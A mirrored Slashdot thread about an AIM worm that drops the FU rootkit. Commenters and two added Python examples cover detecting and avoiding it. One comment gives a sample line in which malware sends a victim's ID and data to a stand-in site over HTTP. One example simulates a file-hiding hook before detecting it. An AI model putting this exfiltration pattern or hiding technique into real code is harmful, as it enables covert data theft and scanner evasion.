Slashdot Mirror


Worm With Rootkit Package Loose On AIM

Mr0624 writes "According to a recent article on C|Net a new worm is swiftly spreading via AIM to many computers. It delivers a brutal root-kit which bypasses security software and takes control of a PC." From the article: "The worm was spotted in an AOL IM chatroom and infected one of the PCs that FaceTime uses for worm bait. The company said it also has seen the pest hit other computers. 'It is still out there, and it is definitely something the user should be leery of ... The rootkit is designed to not be detected, and that is the scary part.'"

25 of 438 comments

  1. Noteworthy tools by nmb3000 · · Score: 5, Informative

    I suppose that anyone in the computer tech/repair shop industry might appreciate tools like Rootkit Revealer right now.

    Hopefully Microsoft's project that hasn't been released yet will show up soon. They also have a few hints to detect rootkits installed on a system including two Slashdot links.

    Hooray for AOL.

    --
    "What do you despise? By this are you truly known." --Princess Irulan, Manual of Muad'Dib
    /)
  2. Old.. by Chickenofbristol55 · · Score: 5, Informative

    This is actually pretty old news; one of my friends got this a few weeks ago (he's not a geek, and he called me because I built this custom PC for him). It's quite easy to fix though: a good ol' System Restore fixes it, and there are many programs that can search for and delete rootkits and other trojans (I'm talking about programs besides antivirus programs, which sometimes have a hard time deleting these buggers). The trojan was called directX.exe, found in the windows/system32 folder. My suggestion: don't click on a link from a friend before 1) you know what it is, and 2) you make sure it doesn't say you're downloading a video file when it's obviously a batch or exe file. This virus is not really a big deal; you just have to have half a brain to deal with it.

    --
    public class null extends java applet { System.out.print ("Tabula Rasa"); }
  3. Re:AIM client, or AIM protocol? by antifoidulus · · Score: 2, Informative

    Considering the rootkit is spread by users clicking links and has NOTHING at all to do with the protocol, I'd have to go ahead and say yeah, it can spread via any client that lets you click on links, and I'd also have to say RTFA.

  4. How to remove it. The answer. by TheGSRGuy · · Score: 3, Informative

    http://www.jayloden.com/VirusClean.htm

    This tool is updated almost daily. 100% effective, I can vouch for it. You can become infected if you click the link on non-AIM clients, but it won't spread to everyone else on your buddylist.

  5. Re:Only Chat room users affected? by AnamanFan · · Score: 5, Informative

    Assuming you're on a Windows operating system.

    Use of GAIM will only prevent propagation of this worm. There are more levels at play here.

    The worm is actually installed from a link you would click on from an infected IM. Nothing fancy here; it's just a simple HTML link. Clicking on this link will call up your web browser. What happens here depends on the browser, patches, browser settings, and you. In IE, it's likely that the executable will just run, or it will ask you to download/run said file. The latter is true for Firefox or Opera as well as IE.

    In any case, if your computer runs this executable, the computer is infected and it's game over. BUT, you won't be spreading the worm to others since you're using GAIM. The spreading of the worm depends on the AIM (or AOL?) client running on the computer.

    That is until the worm writers also write for GAIM.

    --
    AnamanFan - Trying to find the Truth, one post at a time.
  6. Re:duh by killa62 · · Score: 5, Informative

    Actually, rootkits go out of their way to be undetected.
    (Shamelessly stolen from grc.com)
    "What happens is, they essentially modify the way the OS itself works. They're compromising the operating system kernel. You know, in operating system terminology we have the notion of a kernel, which is the OS core. And then you've got applications which run as sort of clients of that operating system. So a program you're running, you know, Corel Draw or Outlook or whatever, that's a client of the operating system. Well, so are the spyware scanners. So when you're running even a spyware scanner, it's saying to the operating system - in fact, for example, there are two API calls that's "find first file" and "find next file." So if you ever want to, like, do a directory listing, you'll say "find first file *.*," and it gives you the first file. And then you successively call "find next," "find next," "find next," until it returns no more files. That's all there is to it. So that's - so anything that's scanning your system is basically doing that.

    Well, imagine if something altered the way the "find first" and "find next" operated, so that it was intercepting the response back to you, out of the operating system, back to any application that was asking, so that if it was about to report one of its own files, it would call - it would say, whoops, and call "find next" again on your behalf, skipping over that file. Suddenly any program running on the operating system will not see any of those stealthed, rootkitted files. They just disappear. "

    link
    http://www.grc.com/sn/SN-009.htm
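
To make the mechanism in that quote concrete, here is an added example (written for this page, not code from grc.com or from any tool mentioned in the thread). It models a find-first/find-next enumerator, a hooked version that skips its own files by calling find-next again on the caller's behalf, and the cross-view check a detector such as Rootkit Revealer performs: enumerate through the API, read the directory independently, and report whatever one view has that the other lacks. The file table, the driver name msdirectx.sys and the hidden-name prefix are constructed for the example; directX.exe is the name a commenter above reported.

```python
"""Cross-view detection of files hidden by a directory-enumeration hook.

Added example, not from the thread or from grc.com. The raw directory
table below stands in for reading the on-disk structures directly; in a
real detector that second view comes from parsing the volume rather than
from asking the (possibly hooked) operating system.
"""

# Constructed sample: the files actually present on disk in one directory.
RAW_DIRECTORY_TABLE = [
    "boot.ini",
    "directX.exe",      # the trojan name reported in the thread
    "explorer.exe",
    "msdirectx.sys",    # constructed driver name for this example
    "notepad.exe",
    "win.ini",
]

# Constructed: prefix of the names the hypothetical hook keeps out of sight.
HIDDEN_PREFIX = "msdirect"


class DirectoryEnumerator:
    """Minimal FindFirstFile/FindNextFile-style cursor over a file table."""

    def __init__(self, table):
        self._table = list(table)
        self._pos = 0

    def find_first(self):
        """Reset the cursor and return the first entry (None if empty)."""
        self._pos = 0
        return self.find_next()

    def find_next(self):
        """Return the next entry, or None when there are no more files."""
        if self._pos >= len(self._table):
            return None
        entry = self._table[self._pos]
        self._pos += 1
        return entry


class HookedEnumerator(DirectoryEnumerator):
    """Intercepts responses: when an entry it wants hidden is about to be
    returned, it calls find_next again on the caller's behalf, exactly the
    skip-over behaviour the quoted transcript describes."""

    def __init__(self, table, hidden_prefix):
        super().__init__(table)
        self._hidden_prefix = hidden_prefix.lower()

    def find_next(self):
        entry = super().find_next()
        while entry is not None and entry.lower().startswith(self._hidden_prefix):
            entry = super().find_next()
        return entry


def enumerate_via_api(enumerator):
    """Walk the enumerator the way any application (or scanner) would."""
    names = []
    entry = enumerator.find_first()
    while entry is not None:
        names.append(entry)
        entry = enumerator.find_next()
    return names


def cross_view_diff(api_view, raw_view):
    """Return (hidden, phantom): entries on disk the API never reported,
    and entries the API reported that are not on disk. Either disagreement
    means the host needs a closer look."""
    api_set, raw_set = set(api_view), set(raw_view)
    return sorted(raw_set - api_set), sorted(api_set - raw_set)


def detect_hidden_files(raw_table=RAW_DIRECTORY_TABLE, hidden_prefix=HIDDEN_PREFIX):
    """Enumerate through the hooked API and diff against the raw table."""
    api_view = enumerate_via_api(HookedEnumerator(raw_table, hidden_prefix))
    hidden, phantom = cross_view_diff(api_view, raw_table)
    return {"api_view": api_view, "hidden": hidden, "phantom": phantom}


if __name__ == "__main__":
    result = detect_hidden_files()
    print("Reported through the API:", result["api_view"])
    print("Present on disk but never reported:", result["hidden"])
```

The detector never trusts the enumeration API on its own; the signal is the disagreement between two views of the same directory, which is why a well-hidden kit has to lie consistently to every path a scanner might take.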

  7. Yahoo.com and Google.com by tepples · · Score: 4, Informative

    How many people still use .com files anyway?

    Yahoo.com, Google.com, Fark.com, News.com.com... Windows stores Internet shortcuts in files with the .url suffix, but even when you have "hide file extensions" turned off, Windows still hides the .url suffix, making it nearly impossible to distinguish Google.com from Google.com.url in icon view and difficult in any other view. The little arrow in the corner doesn't mean much, as the Google.com file could contain an icon with the arrow already drawn inside.

    1. Re:Yahoo.com and Google.com by wx327 · · Score: 4, Informative

      You can change these settings in explorer by going to (using the URL internet shortcut as an example):
      Tools/Folder Options/File Types/URL/Advanced/Always show extension

      Alternatively, you can edit the registry and create the following key:
      [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut] (slashcode will probably insert a space somewhere in there)
      "AlwaysShowExt"=""

  8. Re:When everyone runs as root already by Mantus · · Score: 3, Informative

    Due to poor software design, it's difficult to not run as admin. Most programs run with no problem, but some, like WinAMP, need to have their directory permissions changed to run as a non-admin. While this isn't a problem for power users, most users won't even know how to change the permissions (in XP Home you need to boot into safe mode to get the security tab to appear in the file properties window).

    Despite the fact that the \Documents and Settings\username folder exists, some developers choose not to use it, and that causes problems.

  9. 'Rootkit' detection by dedazo · · Score: 2, Informative

    OK, I have a beef with this being called a 'rootkit'; it's really a trojan that can hide itself very well. But anyway. SysInternals has a sort-of 'rootkit' detector called Autoruns that looks at everything that is loaded into kernel and userspace at boot time. It's extremely useful because it provides an abridged view of what your PC is running when it starts. This is not a 'click here' end user tool; you have to know what you're looking for. But I used it a few months ago to get rid of a nasty worm on a friend's machine. You might also want to get Process Explorer to actually get the cleanup done.

    Or... just tell people not to download crap from 'teh interweb'.

    --
    Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
  10. Re:A couple of hours? by mindstrm · · Score: 3, Informative

    Right then, well, "System Restore" is a feature of Windows XP that snapshots the status of a whole bucketload of system settings, DLLs, etc. Each time you update software, and at other times determined by the system, these snapshots are taken. You can go into System Restore and revert to your system status from yesterday, last week, or just before you installed something, and it generally works very well (meaning quickly, reliably, and it doesn't erase your data). It doesn't make a mess, either.

    It was a very surprisingly well done feature; I can't actually believe it came from MS.

  11. Some viruses DO run on WINE by killa62 · · Score: 3, Informative

    Some windows viruses do run under WINE. However, they do not affect the system to the extent that windows viruses affect windows systems. They RUN, but mostly nothing else happens other than wasting CPU cycles.

    I think this was posted on /. before.
    http://os.newsforge.com/article.pl?sid=05/01/25/1430222&from=rss

    1. Re:Some viruses DO run on WINE by cerberusss · · Score: 2, Informative

      The article text was posted as a comment to that story.

      --
      8 of 13 people found this answer helpful. Did you?
  12. Re:hah by rm999 · · Score: 2, Informative

    In the case of AIM, I am pretty sure you have to click a link. And I stand by my opinion, regardless of what the moderators think :)

  13. Re:Wow... by oPless · · Score: 2, Informative

    Actually it's much worse.

    Administrator privs on Windows is pretty much "root" as far as users are concerned, *but* there is a higher level of privs: the SYSTEM user, which has complete control (IIRC, and I might not cos it's 4:30am here); it's near enough to acting like the operating system as makes no difference.

    Rootkits tend to get themselves SYSTEM privs :o(

  14. FDisk in 2005? by Anonymous Coward · · Score: 3, Informative

    I had a rootkit last month. Nothing could get rid of it but a full fdisk/mbr where I lost everything. It was MBR based and would append itself when running windows which made it nearly impossible to delete.

    It's 2005 and you only tried FDisk? There's a number of free boot record editors that could have fixed anything. There is no rootkit that I know of that is based out of the MBR the way the old Pakistani virus did to Apples. If I have a customer who needs data recovered off a rootkit infected computer I put it in as a slave in a WXP or W2K system.

    1. Re:FDisk in 2005? by mstromb · · Score: 2, Informative

      Which is one of the reasons why autorun is one of the most insecure things about windows. Yay for randomly running arbitrary commands from unknown sources!

      Unfortunately, if you turn it off, anyone else using your computer becomes incredibly confused as to why Windows "doesn't work".

      Also, I've run fdisk /mbr on Windows XP machines in the past (fixing botched dual boot attempts), and not had an issue. As far as I know, that command simply resets the MBR to the default value - that is, run ntoskern or whatever on block 0 of partition 0. More or less. Or is that completely wrong?

    2. Re:FDisk in 2005? by clymere · · Score: 3, Informative

      Using a clean Windows machine to fix an infected Windows drive isn't all that smart in the first place. This is an area where live disks excel, Knoppix being the obvious first choice...not to mention the many variants with more specialized tools added on. You're running a different OS, it's running off of read-only media, and you're risking essentially nothing.

      --
      once you go slack, you never go back
  15. Re:Only Chat room users affected? by glitch0 · · Score: 2, Informative

    They're COM files - the worm has been going around my town for about a week and a half.

    It's usually a link with something like "HEY CHECK OUT THIS PICTURE OF ME - LOLZ!! http://shittywebpage.com/funny.com"

    Since most people don't know that a COM file is executable, they download and run it.

    Unlike the idiots using AIM who've been hit with this.
    Yes, since everyone who doesn't know everything about a file extension not really in common use for many years is an idiot. Plus Windows hides extensions by default, which really doesn't help the problem.

    --
    -Glitch "We all know Linux is great...it does infinite loops in 5 seconds." - Linus Torvalds
  16. About the rootkit by nightcrawler77 · · Score: 4, Informative

    This looks like the same worm a friend of mine got a few weeks ago. I loaded it up in VMWare and discovered that it installed, among other things, the "FU" rootkit.

    I took a rootkit class at this year's Black Hat Training from the guy who wrote FU. He pointed out that it's more of a proof-of-concept rootkit. It does allow you to hide files, registry keys and drivers from both user-mode and kernel-mode processes, but, it really doesn't go out of its way to hide itself from every possible angle, so detection (and thankfully, removal) wasn't that bad.

    I was able to whip up a little app to fix it from within Windows. But had the worm's author actually expanded on FU's techniques and done a better job of hiding the rootkit, recovery would not have been nearly as easy. (Just imagine how much fun it would be to talk a novice through Windows XP's Recovery Console!)

    Once the worm authors start to get better at exploiting the potential of rootkits, we've definitely got a much better problem on our hands. The old "1. get infected, 2. run anti-virus to disinfect, 3. repeat" cycle just won't work anymore. Good luck even finding a well-implemented rootkit once it's in your kernel, let alone trying to clean it up while it's effectively able to veto every action you take.

    (Yet another reason why no Windows user should run as an Administrator.)

    --

    "Power corrupts, and absolute power corrupts absolutely." -- Lord Acton

  17. Re:Only Chat room users affected? by Aenema · · Score: 2, Informative

    Yes. Even though it's likely GAIM won't spread it, you'll still get some spyware.
    In case you haven't seen any instances where someone is infected, the messages are usually similar to

    Wow! (http://genericwebhosting.com/XxXILikeSpreadingTrojans/cool.com)
    or
    Check this out! (http://genericblog.com/picture01.exe)

    which can only be so obvious, but, then again, the mainstream instant messaging crowds are full of dumbasses.
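
An added example (not from any commenter, and not a real tool) that turns two observations from this thread into checks a defender can run over IM traffic or a file listing: the sample messages here and in comment 15 carry links whose target ends in .com or .exe while the text promises a picture, and comment 7 notes that Explorer hides the .url suffix so that Google.com.url is shown as Google.com. The messages, the hosts (under the reserved .invalid domain) and the extension lists below are constructed for the example.

```python
"""Flagging executable-disguised links and masked file extensions.

Added example, not from the thread. Two checks:
  1. executable_links(): URLs in a message whose path ends in an extension
     Windows will run directly when the download is opened.
  2. masked_extension(): file names where a suffix Explorer always hides
     (.url, .lnk, .pif) leaves a different, misleading extension on display.
"""
import posixpath
import re
from urllib.parse import urlsplit

# Extensions Windows treats as directly runnable when opened (constructed list).
EXECUTABLE_EXTENSIONS = {".com", ".exe", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js"}

# Extensions Explorer hides even with "hide extensions for known file types" off.
ALWAYS_HIDDEN_EXTENSIONS = {".url", ".lnk", ".pif"}

# Stops at whitespace and the brackets/quotes IM clients wrap links in.
URL_PATTERN = re.compile(r"""https?://[^\s()<>"']+""", re.IGNORECASE)

# Constructed sample messages modelled on the ones quoted in the thread.
SAMPLE_MESSAGES = [
    "HEY CHECK OUT THIS PICTURE OF ME - LOLZ!! http://example.invalid/funny.com",
    "Wow! (http://example.invalid/XxX/cool.com)",
    "Check this out! (http://example.invalid/picture01.exe)",
    "here's the writeup http://example.invalid/notes/report.html",
    "photo http://example.invalid/img/holiday.jpg?size=large",
]


def url_file_extension(url):
    """Extension of the URL's path component, lower-cased, ignoring any query."""
    path = urlsplit(url).path
    return posixpath.splitext(path)[1].lower()


def executable_links(message):
    """Return the URLs in a message whose target has an executable extension."""
    return [u for u in URL_PATTERN.findall(message)
            if url_file_extension(u) in EXECUTABLE_EXTENSIONS]


def scan_messages(messages=SAMPLE_MESSAGES):
    """Map each message carrying an executable link to the offending links."""
    flagged = {}
    for message in messages:
        links = executable_links(message)
        if links:
            flagged[message] = links
    return flagged


def displayed_name(filename):
    """Name Explorer shows: only the always-hidden suffixes are stripped."""
    stem, ext = posixpath.splitext(filename)
    return stem if ext.lower() in ALWAYS_HIDDEN_EXTENSIONS else filename


def masked_extension(filename):
    """True when the displayed name ends in an extension that is not the real one,
    e.g. Google.com.url displays as Google.com."""
    shown = displayed_name(filename)
    if shown == filename:
        return False
    return posixpath.splitext(shown)[1] != ""


if __name__ == "__main__":
    for message, links in scan_messages().items():
        print("executable link:", links, "in", repr(message))
    for name in ("Google.com.url", "readme.url", "picture.jpg"):
        print(name, "-> shown as", displayed_name(name), "masked:", masked_extension(name))
```

The link check looks only at the URL path, so a query string or a capitalised extension cannot slip past it; the file-name check reproduces what the user actually sees, which is the only thing the "is this really a picture?" decision can be based on.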

  18. IE and i.e. by stonedonkey · · Score: 5, Informative

    IE: The worm is a compact, surreptitious BT/Kademlia client.

    Took me a second to realize that "IE" meant "id est" and not Internet Explorer. And "id est" means "that is," not "for example," also known as e.g. (exempli gratia).

    Handy cheat sheet:

    i.e. = id est = that is (not commonly capitalized, or punctuated as an acronym like IE)

    e.g. = exempli gratia = for example

    There's your pedantic lesson of the day :p

    1. Re:IE and i.e. by PakProtector · · Score: 2, Informative
      IE: The worm is a compact, surreptitious BT/Kademlia client.
      Took me a second to realize that "IE" meant "id est" and not Internet Explorer. And "id est" means "that is," not "for example," also known as e.g. (exempli gratia).

      Handy cheat sheet:

      i.e. = id est = that is (not commonly capitalized, or punctuated as an acronym like IE)

      e.g. = exempli gratia = for example

      There's your pedantic lesson of the day :p

      Now, let me pedantically correct you. I.e. does indeed stand for 'id est,' but 'id est' does not mean 'that is.' 'id est' is Latin for 'it is.' I know this, because I speak the bloody language. Thank you.

      --

      Edward@Tomato - /home/Edward/ man woman
      man: no entry for woman in the manual.
      "Qua!?"

    2. Re:IE and i.e. by suwain_2 · · Score: 2, Informative

      These aren't "real" translations, but I find this to be easier to remember:

      i.e. = "in effect" ("in other words")
      e.g. = "example given"

      Just think of it as a handy mnemonic device as opposed to literal translations.

      --
      ________________________________________________
      suwain_2 :: quality slashdot p
  19. Re:Who of us actually would click... by glesga_kiss · · Score: 2, Informative
    And for the person who is no doubt going to ask "Well how do you know you don't have a virus if you have no virus scanning software?". Simple. If I had a virus it would have to be one that:

    - Did not affect the running of my computer negatively.

    - Did not create any network traffic.

    - Did not attempt to infect files.

    So, if I had a virus that met all of those criteria, I don't think I'd have to worry about catching it.

    How did you know that it didn't dial home? You said you had no security and no anti-virus, and that you were running natd/ipfw. Perhaps if you were also running some intrusion detection software on the firewall, or had an application-level firewall, you might actually be able to say "did not create any network traffic"? What were you doing to make this assertion? Watching the blinkenlights on the hub?

    The perfect virus (nowadays) does the following:

    • Infects silently
    • Rarely dials home, and when it does it's piggybacked on another, non-suspicious protocol. E.g. "firefox http://mydodgysite?id=yourUniqueId&data=fillInHere
    • Does not impact the day-to-day running of the PC
    • Patches the original vulnerability to:
      • prevent other viruses stealing away the rooted box
      • prevent other viruses from impacting the operation of the PC (meaning it gets fixed or reinstalled)

    Don't have any programs, I MEAN ANY, which automatically run any sort of executable. That's just asking for it.

    You truly are an idiot. ALL programs can do this. It's a basic part of how programs work, they make calls to other programs! The question is, can they be made to run malware through either bad design or exploit (e.g. buffer overflow). There is NOTHING you can do against the latter. Even the infallible Firefox is currently on v1.07 because of EXPLOITS in older versions.

    The only system I can think of that can stop apps running system commands is Java. You don't seem like the Java type somehow though.

    "Don't use your firewall to do your job for you. Shut off the services you don't need."

    That's IN ADDITION to a firewall. NEVER rely on software on your PC to sort out what you have open. A virus can easily (silently) restart a service, and you'd NEVER know. Likewise with "personal firewalls". The firewall should be a different box with different accounts. If you are truly paranoid, never enter its password on a potentially hacked machine and stick to console access only.

    I hope you are running security for anything important...